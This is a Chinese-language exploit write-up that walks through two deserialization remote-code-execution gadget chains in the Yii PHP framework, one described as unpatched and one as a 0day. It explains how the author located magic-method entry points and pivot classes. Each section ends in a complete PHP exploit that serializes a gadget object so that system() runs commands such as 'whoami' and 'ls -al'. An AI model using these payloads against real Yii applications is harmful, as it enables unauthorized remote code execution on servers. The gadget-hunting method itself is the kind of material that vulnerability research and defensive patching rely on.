Yii框架反序列化RCE利用链2(官方无补丁)

Author:AdminTony

1.寻找反序列化点

全局搜索__wakeup函数，如下：

找到\symfony\string\UnicodeString类，其__wakeup方法中调用了normalizer_is_normalized方法。

该方法要求传入的内容是字符串。且$this->string可控，那么只要找到一条由__toString方法构造的利用链即可。

全局搜索__toString方法，寻找可用的点,最终找到：

($this->value)()这种形式，函数名可控，然后结合IndexAction类的run方法即可形成反序列化利用链。

最终利用链：

\yii\rest\IndexAction->run()\symfony\string\LazyString->__toString()\symfony\string\UnicodeString->stringnormalizer_is_normalized()\symfony\string\UnicodeString->__wakeup()

2.构造payload

• 实例化\yii\rest\IndexAction类，设置其$checkAccess变量、$id变量和$config变量

• 实例化\symfony\string\LazyString类，设置其$value变量为IndexAction类和run方法数组

• 实例化\symfony\string\UnicodeString类，设置其$string变量值为LazyString类。

最终Exp:

<?php namespace Symfony\Component\String{    class UnicodeString{        public $string;    }    class LazyString{        public $value;    }}namespace yii\rest{    class IndexAction{        public $id;        public $controller;        public $config;        public $checkAccess;    }}namespace {    //use Symfony\Component\String;    //use yii\rest;    //1,'\yii\web\Controller',['modelClass'=>'\yii\db\BaseActiveRecord']    $indexAction = new yii\rest\IndexAction();    $indexAction->id = 'whoami'; // 修改执行的函数值，如whoami    $indexAction->controller = '\yii\web\Controller';    $indexAction->config = ['modelClass'=>'\yii\db\BaseActiveRecord'];    $indexAction->checkAccess = 'system'; // 修改执行的函数名，如system    $lazyString = new Symfony\Component\String\LazyString();    $lazyString -> value =[$indexAction,"run"];    $unicodeStringObj = new Symfony\Component\String\UnicodeString();    $unicodeStringObj->string=$lazyString;    var_dump(base64_encode(serialize($unicodeStringObj)));}

效果如下：

Yii框架反序列化RCE利用链3(0day)

Author:AdminTony

挖到以后，去翻了下朋友圈，发现已经有师傅在昨天晚上公开了。

1.寻找__destruct方法

寻找__destruct方法的时候主要注意几个点：

• 该__destruct方法中是否有call_user_func($this->test,[$this->arr])或者$this->test()类型的可控函数

• 该__destruct调用过程中，有没有$this->reader->getUser()类型的调用，此类调用有两种跳板选择方法

  • 找getUser函数，通过getUser函数找到一条代码执行利用链

  • 找__call函数，通过__call函数找到一条代码执行利用链条

• 该__destruct调用过程中，是否能触发其他魔法函数，比如test($this->tests),test函数要求传入String类型参数时，如果我们设置的$this->tests是一个类，则会自动调用该类的__toString方法，然后从__toString找到一个反序列化利用链。

本着这几点思路，开始寻找。

vendor/codeception/codeception/ext/RunProcess.php代码片段：

__destruct方法中调用了stopProcess方法，该方法$process可控，从而形成$this->reader->getUser()类型调用，我们可以寻找isRunning函数的代码作为跳板或者__call函数的代码执行作为跳板。

2.寻找跳板

vendor/fzaninotto/faker/src/Faker/Generator.php代码片段：

跟进format函数：

找到call_user_func_array，那么我们只需要让$this->getFormatter($formatter)的结果是我们指定的函数即可。

也就是说，$this->formatters['isRunning']设置为想要执行的函数即可，而$arguments我们不可控。只能传入一个对象做函数，借助[(new test),"run"]这样的调用实现代码执行。

正则：call_user_func[_\w+]*\(\$this->[_\$\w]*,\s*\$this-

这样的可用类只有两个IndexAction 和 CreateAction

代码片段来源于：vendor/yiisoft/yii2/rest/IndexAction.php

从而形成一条反序列化RCE利用链。

3.Exp编写

其实Exp编写也是一项比较有意思的活。最开始我总是在controller里面直接实例化利用链里面的几个类，发现还的分析__construct方法，看传入的值，有时候父类太多一直调用parent::__construct也是挺烦的，后来这两天看米斯特的奶权师傅直接重新定义了一个类，然后把必要的值传入其中。试了下，这个方法真的好用，再也不用管__construct方法了。

说了这么多废话，开始放EXP：

<?php // RunProcess->stopProess ->> $process->isRunning() -->> Generator->__call ->> IndexAction->runnamespace Codeception\Extension{    class RunProcess{        public $processes;    }}namespace Faker{    class Generator{        public $formatters;    }}namespace yii\rest{    class IndexAction{        public $checkAccess;        public $id;    }    class UpdateAction{        public $checkAccess;        public $id;    }}namespace {    //$indexAction = new yii\rest\IndexAction('whoami',1,["modelClass"=>'BaseActiveRecord']);    $indexAction = new yii\rest\IndexAction();    $indexAction->id = 'ls -al';    $indexAction->checkAccess = 'system';    $generator = new Faker\Generator();    $generator->formatters = ["isRunning"=>[$indexAction,"run"]];    $runProcess = new Codeception\Extension\RunProcess();    $runProcess->processes = array($generator);    //$runProcess->setProcesses(array($generator));    var_dump(base64_encode(serialize($runProcess)));}